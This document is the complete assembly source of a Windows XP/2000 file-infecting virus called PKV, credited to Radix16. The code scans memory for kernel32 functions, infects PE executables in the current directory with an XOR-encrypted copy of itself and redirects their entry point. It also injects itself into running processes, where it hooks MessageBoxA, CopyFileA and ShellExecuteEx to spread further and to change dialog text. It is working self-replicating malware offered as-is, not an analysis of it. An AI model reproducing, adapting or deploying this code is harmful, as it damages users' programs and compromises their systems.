WinXP.PKV by Radix16/Whackerz
; Made in Czech republic ; ; TARGET : EXE(PE) ; API HOOK: MessageBoxA, CopyFileA, ShellExecuteEx in all process ; ; ; PAYLOAD REPLACE MESSAGE BOX ; --------------------------- ; ------------------------------------ ; |PKV by Radix16/ELEMENT | ; |----------------------------------| ; |I am sorry: MessageBox is my..haha| ; | | ; | OK | ; ------------------------------------ ; ; kernel32.MessageBoxA: ; XXXXXXXX JMP virus_newmessagebox ; . ; . ; . ; . ; virus.newmessagebox: ; XXXXXXXX [esp + 16],XXX ; uType ; XXXXXXXX [esp + 12],XXX ; Caption ; XXXXXXXX [esp + 8],XXX ; Text ; XXXXXXXX [esp + 4],XXX ; hWnd ; . ; XXXXXXXX JMP old_messagebox ; . ; . ; . ; old_messagebox: push 00000000h ; push dword ptr [esp + 14h] ; push dword ptr [esp + 14h] ; push dword ptr [esp + 14h] ; push dword ptr [esp + 14h] ; JMP MessageBoxEx ; ; ; ShellExecuteEx RULE ; ------------------- ; [EXECUTE] > Infection all files in the directory and return original Shell... ; I testing in WindowsCommander. ; ; ; contact me ; ---------- ; radix16.cjb.net ; radix16@altas.cz ; ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ .386p locals jumps .model flat extrn GetModuleHandleA :proc extrn ExitProcess :proc extrn MessageBoxA :proc vsize equ end_virus - start + 1500 max_path equ 0FFh COPY_MARK equ 0ABC123h include Useful.inc include Win32API.inc include MZ.inc include PE.inc S MACRO db ( vsize ) / 01000 mod 10 + "0" db ( vsize ) / 00100 mod 10 + "0" db ( vsize ) / 00010 mod 10 + "0" db ( vsize ) / 00001 mod 10 + "0" ENDM .data db 'PKV size =' S .code start: jmp real_start xxx__000: pushad @SEH_SetupFramepush eax mov ebx,eax mov ecx,255 if_exe: cmp [eax],06578652Eh ; .exe je n_xe__ inc eax ; + loop if_exe jmp back_host n_xe__: xor dl,dl cmp byte ptr [eax + 4],dl ; last 0? jne back_host xor edx,edx se_tg: cmp byte ptr [eax],'\' je put_z cmp eax,ebx je no_dr dec eax loop se_tg put_z: mov byte ptr [eax],dl mov edx,eax no_dr: pop eax mov esi,077E60000h ; XP kernel32 mov edi,COPY_MARK jmp xxx__001 start_x: pushad @SEH_SetupFrame mov esi,077E60000h jmp xxx__001 real_start: push offset first_generation ; old entery point RVA oldeip equ $ - 4 pushad ; save all reg. mov esi,[esp+24h] ; get kernel base address @SEH_SetupFrame xxx__001: call delta delta: pop ebp ; get sub ebp,offset delta ; delta address cmp edi,COPY_MARK jne encrypt mov [ebp + set_tg_x],edx mov [ebp + address_file],eax ; save pointer to file encrypt: mov edx,00000000h ; encrypt key enc_key = dword ptr $ - 4 mov ecx,(crypt_end - crypt_start) / 4 ; size to encrypt lea eax,[ebp + crypt_start] ; pointer to start encr. encr_l: xor [eax],edx add eax,4 loop encr_l crypt_start equ $ mov ecx,100 ; xchg esi,eax and eax,0ffff0000h ; ax = null c_MZ: cmp word ptr [eax],'ZM' ; test MZ je c_PE n_P: sub eax,1000h ; - page dec ecx jnz c_MZ jmp back_host ; not found end v. c_PE: mov ebx,eax add eax,[eax + 3ch] ; PE header cmp dword ptr [eax],'EP' ; test PE jnz n_P cmp ebx,077E60000h jne back_host mov dword ptr [ebp + kernel32],ebx ; save Kerne32 base addr xor eax,eax mov dword ptr [ebp + dd_api_s],eax mov dword ptr [ebp + set_api],eax d_scan_loop: call decompress_API ; decompress API fce or esi,esi je API_complete ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ ; SCAN API ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ mov edx,dword ptr [ebp + kernel32] ; edx < kernel base address mov ebx,edx add ebx,[ebx + 3ch] mov ebx,[ebx + 78h] ; export section add ebx,edx mov edi,[ebx + 20h] ; addres of names lea edi,[edi + edx - 4] push esi push edi next_name: mov esi,[esp + 4] mov edi,[esp] add edi,4 mov [esp],edi mov edi,[edi] add edi,edx api_loop: lodsb ; ESI > al cmp al,[edi] jne next_name inc edi or al,al je api_found ; found ? jmp api_loop api_found: pop edi pop esi sub edi,[ebx + 20h] sub edi,edx mov eax,[ebx + 1ch] ; addres of function add eax,edx mov ecx,[ebx + 14h] sub ecx,[ebx + 18h] ; number of names lea eax,[eax + 4 * ecx] add eax,edi mov eax,[eax] ; create full offset add eax,edx ; to api function mov edx,00000000h dd_api_s equ $ - 4 mov dword ptr [ebp + dd_apis + edx],eax ; save jmp d_scan_loop API_complete: call [ebp + ddGetVersion] ; get version cmp al,5 ; 2K or XP jne back_host call memory_spider ; Hack API mov ebx,[ebp + address_file] or ebx,ebx je if_cpx mov eax,[ebp + set_tg_x] or eax,eax je cp_nan lea eax,[ebp + dir_buf] push eax push 256 call [ebp + ddGetCurrentDirectoryA] push ebx call [ebp + ddSetCurrentDirectoryA] mov ebx,[ebp + set_tg_x] inc ebx jmp cp_nan ; infect in current directory ; yea go! if_cpx: lea ebx,[ebp + exe_file] cp_nan: lea eax,[ebp + search] push eax push ebx call [ebp + ddFindFirstFileA] ; search *.exe inc eax je next_vej ; found file? dec eax call infect_exe ; infect rule next_vej: xor eax,eax mov dword ptr [ebp + enc_key],eax back_host: mov ebx,[ebp + set_tg_x] or ebx,ebx je no_setting mov byte ptr [ebx],'\' xor eax,eax mov [ebp + set_tg_x],eax mov [ebp + address_file],eax lea eax,[ebp + dir_buf] push eax call [ebp + ddSetCurrentDirectoryA] no_setting: @SEH_RemoveFrame popad ret ; back to host address_file dd 00000000h ; directory set_tg_x dd 00000000h ; + 1 = filename exe_file db '*.exe',0 ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ ; DECOMPRESS API ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ decompress_API: ; decompress API names mov esi,00000000h set_api equ $ - 4 or esi,esi jne api_d_8n call api_compress db 1, 'First', 2, 'A', 0 ; FindFirstFileA db 1, 'Next', 2, 'A', 0 ; FindNextFileA db 1, 3, 0 ; FindClose db 4, 2, 'A', 0 ; CreateFileA db 4, 2, 'Mapping', 'A', 0 ; CreateFileMappingA db 'Map', 5, 'Of', 2, 0 ; MapViewOfFile db 'Unmap', 5,'Of', 2, 0 ; UnmapViewOfFile db 3, 'Handle', 0 ; CloseHandle db 6, 'Version', 0 ; GetVersion db 7 ,10 , 0 ; OpenProcess db 'Virtual', 9, 'Ex', 0 ; VirtualAllocEx db 8, 10, 'Memory', 0 ; WriteProcessMemory db 'Read', 10, 'Memory',0 ; ReadProcessMemory db 6, 'ProcAddress', 0 ; GetProcAddress db 'LoadLibraryA', 0 ; db 'FreeLibrary',0 db 6, 'CurrentDirectoryA',0 ; GetCurrentDirectoryA db 'SetCurrentDirectoryA',0 ; SetCurrentDirectoryA db 0AAh name_table: db 'Find' ; 1 db 'File' ; 2 db 'Close' ; 3 db 'Create' ; 4 db 'View' ; 5 db 'Get' ; 6 db 'Open' ; 7 db 'Write' ; 8 db 'Alloc' ; 9 db 'Process' ; 11 s_table = $ - name_table api_compress: pop esi api_d_8n: lea edi,[ebp + decompress_b] ; buffer push edi api_d_loop: lodsb cmp al,1 ; 1 = Find jne _nex_t mov eax,dword ptr [ebp + name_table] stosd jmp api_d_loop _nex_t: cmp al,2 ; 2 = File jne _nex_t2 mov eax,dword ptr [ebp + name_table + 4] stosd jmp api_d_loop _nex_t2: cmp al,3 ; 3 = Close jne _nex_t3 mov eax,dword ptr [ebp + name_table + 8] stosd mov al,byte ptr [ebp + name_table + 12] stosb jmp api_d_loop _nex_t3: cmp al,4 ; 4 = Create jne _nex_t4 mov eax,dword ptr [ebp + name_table + 13] stosd mov ax,word ptr [ebp + name_table + 17] stosw jmp api_d_loop _nex_t4: cmp al,5 ; 5 = View jne _nex_t5 mov eax,dword ptr [ebp + name_table + 19] stosd jmp api_d_loop _nex_t5: cmp al,6 ; 6 = Get jne _nex_t6 mov ax,word ptr [ebp + name_table + 23] stosw mov al,byte ptr [ebp + name_table + 25] stosb jmp api_d_loop _nex_t6: cmp al,7 ; 7 = Open jne _nex_t7 mov eax,dword ptr [ebp + name_table + 26] stosd jmp api_d_loop _nex_t7: cmp al,8 ; 8 = Write jne _nex_t8 mov eax,dword ptr [ebp + name_table + 30] stosd mov al,byte ptr [ebp + name_table + 34] stosb jmp api_d_loop _nex_t8: cmp al,9 ; 9 = Alloc jne _nex_t9 mov eax,dword ptr [ebp + name_table + 35] stosd mov al,byte ptr [ebp + name_table + 39] stosb jmp api_d_loop _nex_t9: cmp al,10 ; 10 = Process jne _nex_t10 mov eax,dword ptr [ebp + name_table + 40] stosd mov eax,dword ptr [ebp + name_table + 44] stosd dec edi jmp api_d_loop _nex_t10: stosb or al,al ; name is complete ? je get_apix ; end ? cmp al,0AAh je api_ok jmp api_d_loop get_apix: pop edi mov dword ptr [ebp + set_api], esi mov esi,edi add dword ptr [ebp + dd_api_s],4 ; add api stuff ret api_ok: pop edi xor esi,esi ; esi = 0 > success ret ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ ; INFECT PE filez ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ infect_exe proc pushad ; save all reg. mov dword ptr [ebp + s_handle],eax ; save search handle i_nfile: mov eax,1235678h mov dword ptr [ebp + set_rd_],eax mov dword ptr [ebp + flash_flag],eax lea edi,[ebp + search.FileName] ; get file name xor eax,eax push eax push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push eax push 1 push 80000000h or 40000000h ; R/W push edi ; filename call [ebp + ddCreateFileA] ; OPEN FILE inc eax je n_inf ; opened ? dec eax xchg eax,ebx xor eax,eax ; eax=0 push eax ; 0 push eax ; 0 push eax ; 0 push PAGE_READONLY push eax push ebx call [ebp + ddCreateFileMappingA] ; Mapping or eax,eax ; ok ? je c_handle_ mov dword ptr [ebp + map_h_],eax ; save map handle xor edx,edx ; edx=0 push edx ; ... push edx push edx push FILE_MAP_READ push eax ; handle of map handle call [ebp + ddMapViewOfFile] ; Map View or eax,eax ; ok ? je c_map_ mov dword ptr [ebp + m_adr_],eax ; save map address mov edi,eax ; CHECK FILE mov edx,[ebp + search.FileSizeLow] cmp word ptr [edi],IMAGE_DOS_SIGNATURE jne un_map_ ; MZ? mov edx,[edi+3ch] ; IT'S BUG!!! cmp edi,edx ; out range ? jb un_map_ add edi,edx cmp dword ptr [edi],IMAGE_NT_SIGNATURE ;P/E/0/0 jne un_map_ cmp word ptr [edi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386 jne un_map_ cmp dword ptr [edi + 12],not '-XdR' ; test infect flag je un_map_ mov edx,dword ptr [edi.NT_FileHeader.FH_Characteristics] not dl test dl,IMAGE_FILE_EXECUTABLE_IMAGE ; executeble ? jnz un_map_ test dh,IMAGE_FILE_DLL shr 8 ; dll ? jnz un_map_ mov ecx,[ebp + search.FileSizeLow] ; ecx = filesize sub ecx,3 ; ecx - 3 push ecx ; save ecx push eax ; sava eax test_flash: cmp word ptr [eax],'lf' ; test flash jne next_loo ; filez cmp word ptr [eax + 2],'sa' je flash_found next_loo: inc eax ; + loop test_flash jmp no_flash flash_found: xor eax,eax mov dword ptr [ebp + flash_flag],eax ; flah file set flag! no_flash: pop eax ; return reg. pop ecx test_net: cmp dword ptr [eax],'ocsm' ; test mscorlib jne next_nt ; cmp dword ptr [eax + 4],'bilr' je un_map_ next_nt: inc eax loop test_net mov edi,0FFh ; all is ok! un_map_: push 12345678h ; close rule m_adr_ equ $ - 4 call [ebp + ddUnmapViewOfFile] c_map_: push 12345678h ; ... map_h_ equ $ - 4 call [ebp + ddCloseHandle] c_handle_: push ebx call [ebp + ddCloseHandle] ; ... cmp edi,0FFh jne n_inf INFECT_REAL: lea edi,[ebp + search.FileName] ; xor eax,eax push eax push eax add eax,3 push eax sub eax,eax push eax inc eax push eax push 80000000h or 40000000h push edi ; open filez call [ebp + ddCreateFileA] inc eax je n_inf dec eax xchg eax,ebx mov dword ptr [ebp + file_h],ebx mov ecx,[ebp + search.FileSizeLow] mov eax,12345678h flash_flag = dword ptr $ - 4 ; flash file ? or eax,eax je flash_file add ecx,vsize + 1000 flash_file: mov dword ptr [ebp + n_size_],ecx xor eax,eax push eax push ecx push eax push PAGE_READWRITE push eax push ebx call [ebp + ddCreateFileMappingA] or eax,eax ; ok ? je c_handle mov dword ptr [ebp + map_h],eax ; save map handle xor edx,edx push 12345678h n_size_ = dword ptr $ - 4 push edx push edx push FILE_MAP_ALL_ACCESS push eax call [ebp + ddMapViewOfFile] or eax,eax ; ok ? je c_map mov dword ptr [ebp + m_adr],eax ; save map address xchg eax,edi mov ebx,edi add edi,[edi+3ch] mov dword ptr [edi + 12],not '-XdR' ; Save original RVA mov eax,[edi.NT_OptionalHeader.OH_AddressOfEntryPoint] add eax,[edi.NT_OptionalHeader.OH_ImageBase] mov dword ptr [ebp + oldeip],eax ; number of section ? movzx ecx,word ptr [edi.NT_FileHeader.FH_NumberOfSections] ; size of PE header movzx edx,word ptr [edi.NT_FileHeader.FH_SizeOfOptionalHeader] push edx xor eax,eax mov al,IMAGE_SIZEOF_SECTION_HEADER mul ecx pop edx add edx,eax add edx,edi sub edx,16 ; edx = last section cmp byte ptr [edx],'.' ; is it ok? jne un_map ; calculate pointer mov ecx,[edx.SH_SizeOfRawData] mov eax,[edx.SH_VirtualSize] cmp ecx,eax jnc ok_ xor esi,esi mov [ebp + set_rd_],esi xchg eax,ecx ok_: add eax,[edx.SH_PointerToRawData] add eax,ebx ; ebx = map file address push edx push edi ; save map call save_virus pop edi ; back pop edx or dword ptr [edx + 24h],0A0000000h mov eax,12345678h set_rd_ = dword ptr $ - 4 or eax,eax jne set_or mov eax,[edx.SH_SizeOfRawData] add eax,[edx.SH_VirtualAddress] jmp set_rd ; calculate virus entery poin set_or: mov eax,[edx.SH_VirtualSize] add eax,[edx.SH_VirtualAddress] ; save new RVA set_rd: mov [edi.NT_OptionalHeader.OH_AddressOfEntryPoint],eax xor eax,eax ; new size mov ecx,[ebp + set_rd_] or ecx,ecx jne next_inf mov eax,300 next_inf: xchg edx,ebx add eax,[ebx.SH_SizeOfRawData] add eax,vsize ; add size to RawData mov ecx,[edi.NT_OptionalHeader.OH_FileAlignment] cdq ; File Align div ecx ; divige mul ecx mov [ebx.SH_SizeOfRawData],eax ; save new size mov ecx,[edi.NT_OptionalHeader.OH_SectionAlignment] ; Object Align mov eax,[edi.NT_OptionalHeader.OH_SizeOfImage] add eax,vsize ; add size to Size of Image cdq div ecx ; divige mul ecx mov [edi.NT_OptionalHeader.OH_SizeOfImage],eax ; set new size un_map: push 12345678h m_adr equ $ - 4 ; close rule call [ebp + ddUnmapViewOfFile] c_map: push 12345678h map_h equ $ - 4 call [ebp + ddCloseHandle] c_handle: push 12345678h file_h equ $ - 4 call [ebp + ddCloseHandle] n_inf: lea eax,[ebp + search] push eax push 12345678h ; ... s_handle equ $ - 4 call [ebp + ddFindNextFileA] ; search next file dec eax je i_nfile ; found ? push dword ptr [ebp + s_handle] ; no, close search call [ebp + ddFindClose] ; handle end_inf: popad ret endp ;--------------------------------------------------------------- ; Generate random number ;--------------------------------------------------------------- _random:pushad push edx dw 310Fh ; RDTSC pop edx mov dword ptr [ebp + enc_key],eax ; save new d/e key popad ret ; MEMORY SPIDER memory_spider proc ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ ; HACK API!!! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ PROCESS_VM_OPERATION = 08h PROCESS_VM_READ = 10h PROCESS_VM_WRITE = 20h pushad @pushsz 'SHELL32.DLL' call [ebp + ddLoadLibraryA] or eax,eax je err_lod @pushsz 'ShellExecuteEx' push eax call [ebp + ddGetProcAddress] or eax,eax je err_lod mov [ebp + o_ShellExecuteEx],eax add eax,8 mov dword ptr [ebp + jmm_shellexe],eax @pushsz 'USER32.DLL' call [ebp + ddLoadLibraryA] or eax,eax je err_lod xchg eax,ebx @pushsz 'MessageBoxA' ; Get MessageBoxA push ebx call [ebp + ddGetProcAddress] or eax,eax je err_pr mov [ebp + o_MessageBoxA],eax ; save @pushsz 'MessageBoxExA' push ebx call [ebp + ddGetProcAddress] or eax,eax je err_pr mov dword ptr [ebp + jmm_msgEXA],eax @pushsz 'CopyFileA' push [ebp + kernel32] call [ebp + ddGetProcAddress] or eax,eax je err_pr mov [ebp + o_CopyFileA],eax add eax,5 mov dword ptr [ebp + jmm_copf],eax xor eax,eax mov ecx,4000h loop_process: inc eax push eax push ecx push eax push 0 push PROCESS_VM_READ or PROCESS_VM_WRITE or PROCESS_VM_OPERATION call [ebp + ddOpenProcess] ; Open Process test eax,eax je next___ xchg eax,esi lea eax,[ebp + tmp] push eax push 4 lea eax,[ebp + cmp_res] push eax push [ebp + o_ShellExecuteEx] push esi call [ebp + ddReadProcessMemory] or eax,eax je next___ cmp byte ptr [ebp + cmp_res],0E9h je next___ call go__ next___: pop ecx pop eax loop loop_process popad ret go__: pushad push PAGE_EXECUTE_READWRITE ; allocate memory in push MEM_RESERVE or MEM_COMMIT ; process for virus push vsize push 0 push esi call [ebp + ddVirtualAllocEx] test eax,eax ; ok ? je err_pr mov dword ptr [ebp + v_base],eax mov ecx,vsize lea eax,[ebp + start] mov edx,dword ptr [ebp + v_base] call write_process ; write virus to allocate dec eax jne err_pr mov eax,dword ptr [ebp + v_base] ; calculate new jmp mov ecx,New_MessageBoxA - start add eax,ecx sub eax,[ebp + o_MessageBoxA] sub eax,5 mov [ebp + jmp_m],eax ; new jump ; memory in process mov ecx,5 lea eax,[ebp + n_message_jmp] mov edx,dword ptr [ebp + o_MessageBoxA] call write_process dec eax jne err_pr mov edx,0 v_base = dword ptr $ - 4 mov eax,edx ; calculate new jmp mov ecx,New_CopyFileA - start add eax,ecx sub eax,[ebp + o_CopyFileA] sub eax,5 mov [ebp + jmp_c],eax ; new jump mov ecx,5 lea eax,[ebp + n_copyfile_jmp] mov edx,[ebp + o_CopyFileA] call write_process ; new CopyFile dec eax jne err_pr mov eax,dword ptr [ebp + v_base] ; calculate new jmp mov ecx,New_execute - start add eax,ecx sub eax,[ebp + o_ShellExecuteEx] sub eax,5 mov [ebp + jmp_x],eax ; new jump mov ecx,5 mov edx,[ebp + o_ShellExecuteEx] lea eax,[ebp + n_six_jmp] call write_process ; ExitProcess dec eax jne err_pr err_pr: push ebx call [ebp + ddFreeLibrary] err_lod: popad ret endp write_process: push 0 push ecx ; size push eax ; start address push edx ; > to push esi ; handle of process call [ebp + ddWriteProcessMemory] ret nop nop crypt_end equ $ ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ ; NEW MESSAGE BOX! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ New_MessageBoxA: xor edx,edx mov [esp + 16],edx call msg_top db 'PKV by Radix16/ELEMENT',0 msg_top:pop eax mov [esp + 12],eax call msg_txt db 'I am sorry: MessageBox is my..haha',0 msg_txt:pop eax mov [esp + 8],eax mov [esp + 4],edx call old_messagebox ret 010h n_message_jmp: db 0E9H jmp_m dd 00000000 old_messagebox: push 00000000h push dword ptr [esp + 14h] push dword ptr [esp + 14h] push dword ptr [esp + 14h] push dword ptr [esp + 14h] mov eax,12345678h jmm_msgEXA = $ - 4 jmp eax ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ ; NEW COPYFILEA ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ New_CopyFileA: mov eax,[esp + 4] call xxx__000 jmp old_copyfilea n_copyfile_jmp: db 0E9H jmp_c dd 00000000 old_copyfilea: push ebp mov ebp,esp push ecx push ecx mov eax,12345678h jmm_copf = $ - 4 jmp eax ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ ; NEW SHELLEXECUTEEXW ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ New_execute: call start_x jmp old_ShellExecuteEx n_six_jmp: db 0E9H jmp_x dd 00000000 old_ShellExecuteEx: push ebp mov ebp,esp mov eax,00001088 mov ecx,12345678h jmm_shellexe = $ - 4 jmp ecx ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ ; SAVE AND ENCRYPT/DECRYPT STUFF ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ save_virus: pushad call _random call crypt_ lea esi,[ebp + start] mov ecx,(vsize - 1000) / 4 ; copy virus to host mov edi,eax mov ebx,edi rep movsd call crypt_ popad ret crypt_: push eax push edx mov edx,[ebp + enc_key] ; decrypt/encrypt key mov ecx,(crypt_end - crypt_start) / 4 lea eax,[ebp + crypt_start] encr_loop_r: xor [eax],edx add eax,4 loop encr_loop_r pop edx pop eax ret nop nop end_virus: ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ ; DATA ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ tmp dd 0 decompress_b db 28 dup (?) dd_apis: ; API offsetz reserved_by_radix16 dd ? ; :) ddFindFirstFileA dd ? ddFindNextFileA dd ? ddFindClose dd ? ddCreateFileA dd ? ddCreateFileMappingA dd ? ddMapViewOfFile dd ? ddUnmapViewOfFile dd ? ddCloseHandle dd ? ddGetVersion dd ? ddOpenProcess dd ? ddVirtualAllocEx dd ? ddWriteProcessMemory dd ? ddReadProcessMemory dd ? ddGetProcAddress dd ? ddLoadLibraryA dd ? ddFreeLibrary dd ? ddGetCurrentDirectoryA dd ? ddSetCurrentDirectoryA dd ? ; HOOK o_MessageBoxA dd ? o_CopyFileA dd ? o_ShellExecuteEx dd ? cmp_res dd ? kernel32 dd ? filetime struc FT_dwLowDateTime dd ? FT_dwHighDateTime dd ? filetime ends ; Find DATA win32_find_data struc FileAttributes dd ? CreationTime filetime ? LastAccessTime filetime ? LastWriteTime filetime ? FileSizeHigh dd ? FileSizeLow dd ? Reserved0 dd ? Reserved1 dd ? FileName dd max_path DUP (?) AlternateFileName dd 13 DUP (?) dd 3 DUP (?) win32_find_data ends search win32_find_data ? dir_buf db 256 dup (?) virtual_end: first_generation: ; First generation push 00000000h call xxx_ db 'Radix16',0 xxx_: call zzz_ db 'First generation!',0 zzz_: push 00000000h call MessageBoxA ; create MessageBox push 0 call ExitProcess ; Exit ends end start ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/